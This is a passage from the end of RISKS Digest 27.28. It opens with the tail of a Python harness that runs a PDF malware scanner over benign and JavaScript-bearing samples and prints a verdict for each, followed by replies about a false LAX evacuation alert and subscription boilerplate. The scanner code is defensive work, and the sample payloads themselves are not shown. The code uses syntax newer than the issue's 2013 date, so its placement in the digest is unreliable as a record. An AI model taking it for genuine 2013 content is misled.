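                  + _BLOB + b'\nendstream\nendobj\n')

if __name__ == '__main__':
    for label, pdf in [('benign', BENIGN_PDF), ('js', JS_PDF),
                       ('obfuscated', OBFUSCATED_PDF), ('compressed', COMPRESSED_PDF)]:
        print(f'{label:10s} {verdict(pdf):20s} {scan_pdf(pdf)}')
```

The verdict is meant to gate, not to replace, the advice in the message: a
file flagged javascript-autorun should not be opened in a reader that has
JavaScript enabled, and a file the scan calls clean has only passed a
heuristic that cannot see into encrypted or unusually encoded objects.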

------------------------------

Date: Sun, 05 May 2013 10:09:41 +0200
From: Anthony Thorn <anthony.thorn () atss ch>
Subject: Re: LAX sign story just gets better and better... (RISKS-27.27)

I think the WORST aspect may be:

"Castles said there were no reports of passengers evacuating the terminal ... "
"She said airport officials are looking into ways to ensure a similar
problem does not occur again."

Which problem?   The false alarm, or the fact that nobody took any notice?

------------------------------

Date: Sun, 05 May 2013 22:44:28 +0200
From: "Eric Ferguson" <e.ferguson () antenna nl>
Subject: Re: LAX sign story just gets better and better... (RISKS-27.27)

The biggest issue "that should not occur again" is clearly that no
passengers reacted to the message for 10 minutes. So if there is a real
emergency, the on-screen messages are just about useless.

What happens if this is "fixed" by adding automated pre-recorded loudspeaker
messages telling everyone to evacuate? Then people WILL leave. So then one
slip of the finger on the keyboard can cause major disruption.

Some hard thinking is needed on the whole issue of design and operation of
such automated public alarm systems.  There are also non-negligible issues
of liability in case of "false positives" and "false negatives".

Dr. Eric T. Ferguson, Consultant for Energy and Development,
van Reenenweg 3, 3702 SB  ZEIST  Netherlands  tel: +31 30-2673638

------------------------------

Date: Sun, 7 Oct 2012 20:20:16 -0900
From: RISKS-request () csl sri com
Subject: Abridged info on RISKS (comp.risks)

 The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
 comp.risks, the feed for which is donated by panix.com as of June 2011.
=> SUBSCRIPTIONS: PLEASE read RISKS as a newsgroup (comp.risks or equivalent)
 if possible and convenient for you.  The mailman Web interface can
 be used directly to subscribe and unsubscribe:
   http://lists.csl.sri.com/mailman/listinfo/risks
 Alternatively, to subscribe or unsubscribe via e-mail to mailman
 your FROM: address, send a message to
   risks-request () csl sri com
 containing only the one-word text subscribe or unsubscribe.  You may
 also specify a different receiving address: subscribe address= ... .
 You may short-circuit that process by sending directly to either
   risks-subscribe () csl sri com or risks-unsubscribe () csl sri com
 depending on which action is to be taken.

 Subscription and unsubscription requests require that you reply to a
 confirmation message sent to the subscribing mail address.  Instructions
 are included in the confirmation message.  Each issue of RISKS that you
 receive contains information on how to post, unsubscribe, etc.

=> The complete INFO file (submissions, default disclaimers, archive sites,
 copyright policy, etc.) is online.
   <http://www.CSL.sri.com/risksinfo.html>
 *** Contributors are assumed to have read the full info file for guidelines.

=> .UK users may contact <Lindsay.Marshall () newcastle ac uk>.
=> SPAM challenge-responses will not be honored.  Instead, use an alternative
 address from which you NEVER send mail!
=> SUBMISSIONS: to risks () CSL sri com with meaningful SUBJECT: line.
 *** NOTE: Including the string "notsp" at the beginning or end of the subject
 *** line will be very helpful in separating real contributions from spam.
 *** This attention-string may change, so watch this space now and then.
=> ARCHIVES: ftp://ftp.sri.com/risks for current volume
     or ftp://ftp.sri.com/VL/risks for previous VoLume
 http://www.risks.org takes you to Lindsay Marshall's searchable archive at
 newcastle: http://catless.ncl.ac.uk/Risks/VL.IS.html gets you VoLume, ISsue.
   Lindsay has also added to the Newcastle catless site a palmtop version
   of the most recent RISKS issue and a WAP version that works for many but
   not all telephones: http://catless.ncl.ac.uk/w/r
 <http://the.wiretapped.net/security/info/textfiles/risks-digest/> .
==> PGN's comprehensive historical Illustrative Risks summary of one liners:
    <http://www.csl.sri.com/illustrative.html> for browsing,
    <http://www.csl.sri.com/illustrative.pdf> or .ps for printing
  is no longer maintained up-to-date except for recent election problems.
 *** NOTE: If a cited URL fails, we do not try to update them.  Try
  browsing on the keywords in the subject line or cited article leads.
==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
=    <http://www.acm.org/joinacm1>

------------------------------

End of RISKS-FORUM Digest 27.28
************************
